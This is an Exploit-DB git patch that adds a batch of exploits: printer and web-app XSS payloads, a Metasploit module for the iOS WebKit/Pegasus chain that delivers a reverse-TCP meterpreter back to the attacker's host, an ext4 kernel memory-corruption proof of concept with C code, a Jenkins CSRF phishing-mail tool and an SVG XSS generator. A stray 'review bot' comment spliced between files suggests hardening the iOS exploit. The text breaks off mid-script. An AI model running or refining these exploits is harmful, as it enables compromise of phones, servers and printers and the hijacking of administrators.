From ad4b4f15f3192dece3dd4adc0fa4c607d7aad959 Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Wed, 6 Jun 2018 05:01:46 +0000
Subject: [PATCH] DB: 2018-06-06 11 changes to exploits/shellcodes Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit) Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit) Clone2GO Video converter 2.8.2 - Buffer Overflow 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH) 10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH) 10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH) WebKitGTK+ < 2.21.3 - Crash (PoC) WebKit - not_number defineProperties UAF (Metasploit) EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting Pagekit < 1.0.13 - Cross-Site Scripting Code Generator Brother HL Series Printers 1.15 - Cross-Site Scripting Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)
---
exploits/hardware/webapps/44839.md | 74 +++++++
exploits/ios/remote/44836.rb | 302 ++++++++++++++++++++++++++++
exploits/linux/dos/44832.txt | 282 ++++++++++++++++++++++++++
exploits/linux/local/44842.txt | 66 ++++++
exploits/linux/webapps/44843.py | 219 ++++++++++++++++++++
exploits/php/webapps/44833.txt | 25 +++
exploits/php/webapps/44837.py | 33 +++
exploits/windows/local/44834.py | 34 ++++
exploits/windows_x86/local/44838.py | 75 +++++++
exploits/windows_x86/local/44840.py | 71 +++++++
exploits/windows_x86/local/44841.py | 85 ++++++++
files_exploits.csv | 15 +-
12 files changed, 1279 insertions(+), 2 deletions(-)
create mode 100644 exploits/hardware/webapps/44839.md
create mode 100755 exploits/ios/remote/44836.rb
create mode 100644 exploits/linux/dos/44832.txt
create mode 100644 exploits/linux/local/44842.txt
create mode 100755 exploits/linux/webapps/44843.py
create mode 100644 
exploits/php/webapps/44833.txt
create mode 100755 exploits/php/webapps/44837.py
create mode 100755 exploits/windows/local/44834.py
create mode 100755 exploits/windows_x86/local/44838.py
create mode 100755 exploits/windows_x86/local/44840.py
create mode 100755 exploits/windows_x86/local/44841.py
diff --git a/exploits/hardware/webapps/44839.md b/exploits/hardware/webapps/44839.md
new file mode 100644
index 000000000..12535d46d
--- /dev/null
+++ b/exploits/hardware/webapps/44839.md 
@@ -0,0 +1,74 @@ +# Exploit Title: [ XSS at Brother HL series printers] + + +# Date: [30.05.2018] + +# Exploit Author: [Huy Kha] + +# Vendor Homepage: [http://support.brother.com] + +# Software Link: [ Website ] + +# Version: Brother HL series printers. + +# Tested on: Mozilla FireFox + +# Reflected XSS Payload : + +"--!>" + +# Description : Starting searching for printers without having a password. +When you see a yellow bar with ''Configure the password'' you can take over the full printer by putting a password on it. + + +# PoC : +If you want to execute the XSS you need to be loged into the web interface first. + +# Example : + +1. Go to the following url: http://127.0.0.1/ +2. Login with ''admin'' as password +3. Intercept now the request with Burpsuite +4. The XSS exist in the loginerror.html?url= parameter + +4. Demo URL: http://127.0.0.1/etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 + + +# Request : + +GET /etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: nl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + + +# Response : + +HTTP/1.1 200 OK +Cache-Control: no-cache +Content-Length: 3389 +Content-Type: text/html +Content-Language: nl +Connection: close +Server: debut/1.20 +Pragma: no-cache + + + + Brother HL-L2340D series

HL-L2340D series

Log in"&pageid=241"/>
    • Algemeen

+ + + +# How to fix it? : Update the printer to Firmware 1.16 and set a new password. + +# Screenshot : https://imgur.com/a/3OVTSZ4 + + +# Note: The vendor has been contacted on 30-5-2018. \ No newline at end of file diff --git a/exploits/ios/remote/44836.rb b/exploits/ios/remote/44836.rb new file mode 100755 index 000000000..0d929dc5a --- /dev/null +++ b/exploits/ios/remote/44836.rb 
@@ -0,0 +1,302 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ManualRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'WebKit not_number defineProperties UAF',
+ 'Description' => %q{
+ This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'qwertyoruiop', # jbme.qwertyoruiop.com
+ 'siguza', # PhoenixNonce
+ 'tihmstar', # PhoenixNonce
+ 'timwr', # metasploit integration
+ ],
+ 'References' => [
+ ['CVE', '2016-4655'],
+ ['CVE', '2016-4656'],
+ ['CVE', '2016-4657'],
+ ['BID', '92651'],
+ ['BID', '92652'],
+ ['BID', '92653'],
+ ['URL', 'https://blog.lookout.com/trident-pegasus'],
+ ['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'],
+ ['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'],
+ ['URL', 'https://github.com/Siguza/PhoenixNonce'],
+ ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'],
+ ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'],
+ ],
+ 'Arch' => ARCH_AARCH64,
+ 'Platform' => 'apple_ios',
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },
+ 'Targets' => [[ 'Automatic', {} ]],
+ 'DisclosureDate' => 'Aug 25 2016'))
+ register_options(
+ [
+ OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),
+ OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
+ ])
+ end
+
+ def on_request_uri(cli, request)
+ print_status("Request from #{request['User-Agent']}")
+ if request.uri =~ %r{/loader$}
+ print_good("Target is vulnerable.")
+ local_file = File.join( 
Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" )
+ loader_data = File.read(local_file, {:mode => 'rb'})
+ send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
+ return
+ elsif request.uri =~ %r{/exploit$}
+ local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
+ loader_data = File.read(local_file, {:mode => 'rb'})
+ payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
+ payload_url_index = loader_data.index('PAYLOAD_URL')
+ loader_data[payload_url_index, payload_url.length] = payload_url
+ send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
+ print_status("Sent exploit (#{loader_data.size} bytes)")
+ return
+ end
+ html = %Q^
+
+
+
+
+
+ ^
+ send_response(cli, html, {'Content-Type'=>'text/html'})
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/linux/dos/44832.txt b/exploits/linux/dos/44832.txt
new file mode 100644
index 000000000..06960e71e
--- /dev/null
+++ b/exploits/linux/dos/44832.txt 
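Review bot: `loader_data.index('PAYLOAD_URL')` returns nil when the marker is absent from the shipped `exploit` data file, and the slice assignment on the next line then raises TypeError inside the request handler instead of reporting a usable error; the assignment also uses `payload_url.length` as the slice length, so the number of bytes written is bounded by the LHOST/LPORT string rather than by whatever region the binary reserves for the marker (not visible here), and a longer URL overwrites the bytes that follow it. I would add `fail_with(Failure::NotFound, 'PAYLOAD_URL marker not found in exploit data file') unless payload_url_index` before the slice, and bound the copy to the marker region's length once that size is confirmed from the data file. Separately, `print_good("Target is vulnerable.")` fires on any request matching `/loader$`, which only shows that a client fetched that path; `print_status` would describe it accurately. The `%Q^ ... ^` body served for every other URI is empty as rendered on this page, so the HTML the module returns could not be reviewed.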
@@ -0,0 +1,282 @@ +ext4 can store data for small regular files as "inline data", meaning that the +data is stored inside the corresponding inode instead of in separate blocks. +Inline data is stored in two places: The first 60 bytes go in the i_block field +in the inode (which normally contains a list of blocks instead), the rest goes +in the special filesystem-internal extended attribute "system.data". + +Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can +store extended attribute values not only inline in the inode, but can also store +such values in dedicated inodes. + +When a corrupted filesystem stores the system.data extended attribute value in a +dedicated inode, the kernel gets confused, causing memory corruption. + + + +ext4_find_inline_data_nolock() attempts to locate an inode's inline data by +searching for the system.data xattr using ext4_xattr_ibody_find(). +If the inode has xattrs, ext4_xattr_ibody_find() first checks them for +corruption using xattr_check_inode(), then grabs the wanted xattr using +xattr_find_entry(). +xattr_check_inode() uses ext4_xattr_check_entries() to check the individual +xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr +whose value is in a dedicated inode) - only for inline values, length and offset +checks are performed to ensure that the value actually fits into the inode. +The problem is that ext4_find_inline_data_nolock() then assumes that the +returned xattr uses inline storage and that the returned length will fit into +the inode; it stores the length field from the xattr in +`EXT4_I(inode)->i_inline_size` without further checks. + +Later, when the file is read, ext4_read_inline_data() trusts this length value, +causing an out-of-bounds memcpy() in the following line: + + memcpy(buffer, + (void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len); + + + +To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on: + +1. 
Create a new ext4 filesystem image, with 256-byte inodes and inline data +support: + + $ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k + mke2fs 1.43.7 (16-Oct-2017) + Creating regular file testfs.img + + Filesystem too small for a journal + Creating filesystem with 100 4k blocks and 64 inodes + + Allocating group tables: done + Writing inode tables: done + Writing superblocks and filesystem accounting information: done + +2. Create a 75-byte file in the new filesystem: + + $ mkdir mount + $ sudo mount testfs.img mount + $ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile + 1+0 records in + 1+0 records out + 75 bytes copied, 0.000811554 s, 92.4 kB/s + $ sudo umount mount + +3. Bump up the inode size, bump up the xattr size, and mark the xattr value as + non-inline: + + $ cat fixup.c + #include + #include + #include + #include + #include + #include + #include + + #define __le16 uint16_t + #define __le32 uint32_t + #define __u16 uint16_t + #define __u32 uint32_t + #define __u8 uint8_t + + /* some definitions from kernel headers */ + #define EXT4_NDIR_BLOCKS 12 + #define EXT4_IND_BLOCK EXT4_NDIR_BLOCKS + #define EXT4_DIND_BLOCK (EXT4_IND_BLOCK + 1) + #define EXT4_TIND_BLOCK (EXT4_DIND_BLOCK + 1) + #define EXT4_N_BLOCKS (EXT4_TIND_BLOCK + 1) + #define EXT4_XATTR_MAGIC 0xEA020000 + struct ext4_inode { + __le16 i_mode; + __le16 i_uid; + __le32 i_size_lo; + __le32 i_atime; + __le32 i_ctime; + __le32 i_mtime; + __le32 i_dtime; + __le16 i_gid; + __le16 i_links_count; + __le32 i_blocks_lo; + __le32 i_flags; + union { + struct { + __le32 l_i_version; + } linux1; + } osd1; + __le32 i_block[EXT4_N_BLOCKS]; + __le32 i_generation; + __le32 i_file_acl_lo; + __le32 i_size_high; + __le32 i_obso_faddr; + union { + struct { + __le16 l_i_blocks_high; + __le16 l_i_file_acl_high; + __le16 l_i_uid_high; + __le16 l_i_gid_high; + __le16 l_i_checksum_lo; + __le16 l_i_reserved; + } linux2; + } osd2; + __le16 i_extra_isize; + __le16 i_checksum_hi; + __le32 i_ctime_extra; + __le32 
i_mtime_extra; + __le32 i_atime_extra; + __le32 i_crtime; + __le32 i_crtime_extra; + __le32 i_version_hi; + __le32 i_projid; + }; + struct ext4_xattr_ibody_header { + __le32 h_magic; + }; + struct ext4_xattr_entry { + __u8 e_name_len; + __u8 e_name_index; + __le16 e_value_offs; + __le32 e_value_inum; + __le32 e_value_size; + __le32 e_hash; + char e_name[0]; + }; + + #define INODE_SIZE 256 + + #define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) ) + + int main(int argc, char **argv) { + char *path = argv[1]; + int fd = open(path, O_RDWR); + if (fd == -1) err(1, "open"); + struct stat st; + if (fstat(fd, &st)) err(1, "fstat"); + char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); + if (map == MAP_FAILED) err(1, "mmap"); + for (int i=0; ii_links_count != 1 || ino->i_size_lo != 75) continue; + printf("found inode (idx=%d, size=%u, mode=%ho)\n", + i, ino->i_size_lo, ino->i_mode); + ino->i_size_lo = 60000; + printf(" i_extra_isize = %hu\n", ino->i_extra_isize); + struct ext4_xattr_ibody_header *hdr = + (void*)( ((char*)ino)+128+ino->i_extra_isize ); + if (hdr->h_magic != EXT4_XATTR_MAGIC) continue; + struct ext4_xattr_entry *entry = (void*)(hdr+1); + while (*(uint32_t*)entry != 0) { + printf(" attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n", + entry->e_name_index, entry->e_name_len, entry->e_name, + entry->e_value_offs, entry->e_value_inum, entry->e_value_size); + entry->e_value_offs = 0; + entry->e_value_inum = 20; + entry->e_value_size = 60000; + entry = (void*)( + (char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4) + ); + } + } + } + $ gcc -o fixup fixup.c -Wall + $ ./fixup testfs.img + found inode (idx=555, size=75, mode=100644) + i_extra_isize = 32 + attr: idx=7 name='data' offs=76 inum=0 size=15 + +4. 
Use fsck to fix up the inode checksum (but don't let it fix anything else!): + + $ fsck.ext4 -f testfs.img + e2fsck 1.43.7 (16-Oct-2017) + Pass 1: Checking inodes, blocks, and sizes + Inode 12 has INLINE_DATA_FL flag but extended attribute not found. Truncate? no + Extended attribute in inode 12 has a value size (60000) which is invalid + Clear? no + Inode 12 passes checks, but checksum does not match inode. Fix? yes + Pass 2: Checking directory structure + Pass 3: Checking directory connectivity + Pass 4: Checking reference counts + Pass 5: Checking group summary information + + testfs.img: ***** FILE SYSTEM WAS MODIFIED ***** + + testfs.img: ********** WARNING: Filesystem still has errors ********** + + testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks + +5. Mount the filesystem again: + + $ sudo mount testfs.img mount + +6. Read the file: + + $ hexdump -C mount/testfile + 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| + * + 00000030 00 00 00 00 00 00 00 00 00 00 00 00 04 07 00 00 |................| + 00000040 14 00 00 00 60 ea 00 00 00 00 00 00 64 61 74 61 |....`.......data| + 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| + * + 000004a0 31 00 00 00 00 00 00 00 e0 d1 fc 98 d7 7f 00 00 |1...............| + 000004b0 e0 07 03 99 d7 7f 00 00 00 00 00 00 00 00 00 00 |................| + 000004c0 00 00 00 00 00 00 00 00 e0 5f 00 00 00 00 00 00 |........._......| + 000004d0 64 00 00 00 00 00 00 00 f0 af 02 99 d7 7f 00 00 |d...............| + 000004e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| + [...] + +7. Check dmesg: + + $ dmesg + [...] 
+ [ 3211.552729] ================================================================== + [ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4] + [ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922 + + [ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7 + [ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016 + [ 3211.552799] Call Trace: + [ 3211.552807] dump_stack+0x71/0xab + [ 3211.552813] print_address_description+0x6a/0x250 + [ 3211.552817] kasan_report+0x258/0x380 + [ 3211.552863] ? ext4_read_inline_data+0x114/0x120 [ext4] + [ 3211.552867] memcpy+0x34/0x50 + [ 3211.552914] ext4_read_inline_data+0x114/0x120 [ext4] + [ 3211.552961] ext4_read_inline_page+0x1e4/0x2a0 [ext4] + [ 3211.553006] ? ext4_read_inline_data+0x120/0x120 [ext4] + [ 3211.553053] ext4_readpage_inline+0x13e/0x160 [ext4] + [ 3211.553101] ext4_readpage+0xf5/0x110 [ext4] + [ 3211.553106] generic_file_read_iter+0x9a4/0xea0 + [ 3211.553112] ? filemap_range_has_page+0x160/0x160 + [ 3211.553116] ? save_stack+0x89/0xb0 + [ 3211.553120] ? __kasan_slab_free+0x105/0x150 + [ 3211.553124] ? aa_path_link+0x1f0/0x1f0 + [ 3211.553128] ? do_syscall_64+0x150/0x160 + [ 3211.553132] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 + [ 3211.553137] ? audit_watch_compare+0x1b/0x50 + [ 3211.553142] __vfs_read+0x239/0x340 + [ 3211.553145] ? __x64_sys_copy_file_range+0x2d0/0x2d0 + [ 3211.553149] ? dput.part.19+0x2e/0x1b0 + [ 3211.553154] ? auditd_test_task+0x43/0x60 + [ 3211.553158] vfs_read+0xa5/0x190 + [ 3211.553162] ksys_read+0xa1/0x120 + [ 3211.553166] ? kernel_write+0xa0/0xa0 + [ 3211.553171] do_syscall_64+0x6d/0x160 + [ 3211.553175] entry_SYSCALL_64_after_hwframe+0x44/0xa9 + [ 3211.553178] RIP: 0033:0x7f9ada1af72c + [ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000 + [...] 
+ [ 3211.553197] The buggy address belongs to the page: + [ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0 + [ 3211.553207] flags: 0x17fffc000000021(locked|lru) + [ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff + [ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0 + [ 3211.553222] page dumped because: kasan: bad access detected + [ 3211.553224] page->mem_cgroup:ffff8803cf31cac0 + + [ 3211.553229] Memory state around the buggy address: + [ 3211.553234] ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + [ 3211.553238] ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + [ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff + [ 3211.553246] ^ + [ 3211.553250] ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff + [ 3211.553254] ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff + [ 3211.553257] ================================================================== \ No newline at end of file diff --git a/exploits/linux/local/44842.txt b/exploits/linux/local/44842.txt new file mode 100644 index 000000000..3cb31787e --- /dev/null +++ b/exploits/linux/local/44842.txt 
@@ -0,0 +1,66 @@ +# Title: WebKitGTK+ < 2.21.3 - Crash (PoC) +# Author: Dhiraj Mishra +# Date: 2018-06-05 +# Software: https://webkitgtk.org/ +# CVE: CVE-2018-11646 +# Summary: +# webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in +# UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, +# mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue. + +# PoC: + + + + +Backtrace using fedora 27: + +#0 WTF::StringImpl::rawHash +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508 +#1 WTF::StringImpl::hasHash +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514 +#2 WTF::StringImpl::hash +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525 +#3 WTF::StringHash::hash +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73 +#9 WTF::HashMap, WTF::HashTraits >::get +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406 +#10 webkitFaviconDatabaseSetIconURLForPageURL +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193 +#11 webkitFaviconDatabaseSetIconForPageURL +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318 +#12 webkitWebViewSetIcon +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964 +#13 WTF::Function::performCallbackWithReturnValue +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108 +#15 WebKit::WebPageProxy::dataCallback +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083 +#16 WebKit::WebPageProxy::finishedLoadingIcon +at 
/usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848 +#17 IPC::callMemberFunctionImpl::operator() +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68 +#29 WTF::RunLoop::::_FUN(gpointer) +at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70 +#30 g_main_dispatch +at gmain.c line 3148 +#31 g_main_context_dispatch +at gmain.c line 3813 +#32 g_main_context_iterate +at gmain.c line 3886 +#33 g_main_context_iteration +at gmain.c line 3947x +#34 g_application_run +at gapplication.c line 2401 +#35 main +at ../src/ephy-main.c line 432 + + +# Reference's: +# https://bugs.webkit.org/show_bug.cgi?id=186164 +# https://bugzilla.gnome.org/show_bug.cgi?id=795740 \ No newline at end of file diff --git a/exploits/linux/webapps/44843.py b/exploits/linux/webapps/44843.py new file mode 100755 index 000000000..ff4cf496b --- /dev/null +++ b/exploits/linux/webapps/44843.py 
@@ -0,0 +1,219 @@ +# Exploit Title : Jenkins mailer plugin < 1.20 - Cross-Site Request Forgery +# Date : 2018-06-05 +# Exploit Author : Kl3_GMjq6 +# Vendor Homepage : https://jenkins.io/ +# Software Link : [https://updates.jenkins.io/download/plugins/mailer/1.20/mailer.hpi] +# Version: [Below Version 1.20 (1.1 ~ 1.20) ] +# Ref: https://jenkins.io/security/advisory/2018-03-26/#SECURITY-774 +# Tested on : Linux , Windows +# CVE : CVE-2018-8718 + +import email.message +import smtplib +import getpass + +payload_list = ['url','subject','cover_message','sender','reciver','test_email','smtp_server','l_id','l_pw'] +table = {} +for i in payload_list : + table.update({i:''}) + +def send_mail() : + msg = email.message.Message() + msg['Subject'] = table['subject'] + msg['From'] = table['sender'] + msg['To'] = table['reciver'] + msg.add_header('Content-Type','text/html') + msg.set_payload('\ +'+table['cover_message']+'') + s = smtplib.SMTP(table['smtp_server']) + s.starttls() + s.login(table['l_id'], + table['l_pw']) + s.sendmail(msg['From'], [msg['To']], msg.as_string()) + +def url_set() : + url = str(input("Jenkins Server's URL(ex : http://vuln.jenkins.com) : ")) + if len(url) <= 0 : + print (" Can't Be Null!") + url_set() + elif url[0:4] != "http" : + print (" URL must start with 'http://' ") + url_set() + else : table['url'] = url + +def subject_set() : + subject = str(input ("SUBJECT [Default : Look! Warning with your Jenkins] : ")) + if len(subject) <= 0 : + subject = "Look! Waning with your Jenkins" + table['subject'] = subject + +def cover_message() : + cover_message = str(input ("Cover Message [Default : Here is your Vulnable!] : ")) + if len(cover_message) <= 0 : + cover_message = "Here is your Vulnable!" 
+ table['cover_message'] = cover_message + +def sender() : + sender = str(input ("Attacker E-mail(ex : attacker@abcd.com) : ")) + if len(sender) <= 0 : + print (" Can't Be Null!") + sender() + else : table['sender'] = sender + +def reciver() : + reciver = str(input ("Admin's E-mail(ex : admin@abcd.com) : ")) + if len(reciver) <= 0 : + print (" Can't Be Null!") + reciver() + else : table['reciver'] = reciver + +def test_email() : + test_email = str(input ("Tester E-mail(ex : tester@abcd.com) : ")) + if len(test_email) <= 0 : + print (" Can't Be Null!") + test_email() + table['test_email'] = test_email + +def smtp_server() : + smtp_server = str(input ("SMTP_Server [Default : smtp.gmail.com] : ")) + if len(smtp_server) <= 0 : + smtp_server = "smtp.gmail.com" + table['smtp_server'] = smtp_server + +def l_id() : + l_id = str(input ("Your SMTP_Server ID : ")) + if len(l_id) <= 0 : + print (" Can't Be Null!") + l_id() + table['l_id'] = l_id + +def l_pw() : + l_pw = str(getpass.getpass("Your SMTP_Server PW : ")) + if len(l_pw) <= 0 : + print (" Can't Be Null!") + l_pw() + table['l_pw'] = l_pw + +def set_all () : + url_set() + subject_set() + cover_message() + sender() + reciver() + test_email() + smtp_server() + l_id() + l_pw() + print ("Setting Complit! 
Use 'show' to check options") + +set_help = { + 'all':"Set all payload", + 'help':"Show set commend's help", + 'url_set':"Set only 'url_set' payload", + 'subject_set':"Set only 'url_set' payload", + 'cover_message':"Set only 'cover_message' payload", + 'sender':"Set only 'sender' payload", + 'reciver':"Set only 'reciver' payload", + 'test_email':"Set only 'test_email' payload", + 'smtp_server':"Set only 'smtp_server' payload", + 'l_id':"Set only 'l_id' payload", + 'l_pw':"Set only 'l_pw' payload", + } + +def set_select (a) : + if a=="all" : set_all() + elif a=="url_set" : url_set() + elif a=="subject_set" : subject_set() + elif a=="cover_message" : cover_message() + elif a=="sender" : sender() + elif a=="reciver" : reciver() + elif a=="test_email" : test_email() + elif a=="smtp_server" : smtp_server() + elif a=="l_id" : l_id() + elif a=="l_pw" : l_pw() + elif a=="help" : + for i in set_help : + print (" -%-20s %-s" %(i,set_help[i])) + print ('') + + + +while True : + direct = str(input ("CVE-2018-8718 >> ")).lower() + + if direct == "help" : + print ("""\ + %-10s Show this help menu. + %-10s [-all / -help / -url_set / -subject_set / .... ] + %-10s Set the Payload + %-10s [-all] Show Current Setting. + %-10s Send CSRF use current setting. 
+ """ %("help","set","","show","send")) + + elif direct[0:3] == "set" : + if ' -' not in direct : + if direct == "set" : + set_option = ["help"] + else : + print (" Option error \n") + else : + set_option = direct.split(' -')[1:] + okay = 1 + + if len(set_option) == 1 : + if set_option[0] not in set_help : + print (" Option error \n") + else : + set_select(set_option[0]) + elif len(set_option) >= 2 : + for i in set_option : + if i in ['help', 'all'] : + print (" *Option [-help / -all] cannot be use with another options \n") + okay = 0 + break + for i in set_option : + if i not in set_help : + print (" Option error \n") + okay = 0 + break + if okay == 1 : + for i in set_option : + set_select(i) + + elif direct[:4] == "show" : + if " -" not in direct : + + if direct == "show" : + for i in table : + if i != "l_pw" : + print (" %-20s %s" %(i,table[i])) + print (" If you want to see l_pw... add [-all] option") + print ("") + else : + print (" Option error \n") + else : + show_option = direct.split(" -")[1:] + if (len(show_option) == 1 and show_option[0] == 'all') : + for i in table : + print (" %-20s %s" %(i,table[i])) + print () + else : + print (" Option error \n") + + elif direct == "send" : + print (" Sending CSRF Mail.....") + try : + send_mail() + print (" Succed!!\n") + except : + print (" Fail....") + + elif direct == "exit" : + break + + else : + print (" Usage : help\n") \ No newline at end of file diff --git a/exploits/php/webapps/44833.txt b/exploits/php/webapps/44833.txt new file mode 100644 index 000000000..536149cc1 --- /dev/null +++ b/exploits/php/webapps/44833.txt 
@@ -0,0 +1,25 @@ +# Exploit Title: MyBB Recent Threads Plugin v1.0 - Cross-Site Scripting +# Date: 6/2/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=842 +# Version: 1.0 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-11715 + + +1. Description: +Creates a page that shows threads that the user has posted in when they have unread replies. + + + +2. Proof of Concept: + +- Create or reply to a thread with the following subject +- When someone replies to the thread you will see the alert here /misc.php?action=myrecentthreads + + + +3. Solution: +Update to 1.1 \ No newline at end of file diff --git a/exploits/php/webapps/44837.py b/exploits/php/webapps/44837.py new file mode 100755 index 000000000..7590412ee --- /dev/null +++ b/exploits/php/webapps/44837.py @@ -0,0 +1,33 @@ +# Title: Pagekit < 1.0.13 - Cross-Site Scripting Code Generator +# Author : DEEPIN2 +# Date: 2018-06-05 +# Vendor: Pagekit +# Sotware: https://pagekit.com/ +# Version: < 1.0.13 +# CVE: 2018-11564 +# python3 required + +def makesvg(name, code): + code = '' + code + '' + f = open(name, 'w+') + f.write(code) + f.close + + +if __name__ == '__main__': + print(''' + ______ _______ ____ ___ _ ___ _ _ ____ __ _ _ + / ___\ \ / / ____| |___ \ / _ \/ |( _ ) / / | ___| / /_ | || | +| | \ \ / /| _| _____ __) | | | | |/ _ \ _____| | |___ \| '_ \| || |_ +| |___ \ V / | |__|_____/ __/| |_| | | (_) |_____| | |___) | (_) |__ _| + \____| \_/ |_____| |_____|\___/|_|\___/ |_|_|____/ \___/ |_| + [*] Author : DEEPIN2(Junseo Lee)''') + print('[*] enter name without extension, ex) test.svg -> test') + filename = input('Filename : ') + '.svg' + print('[*] If you want to use alert(), type 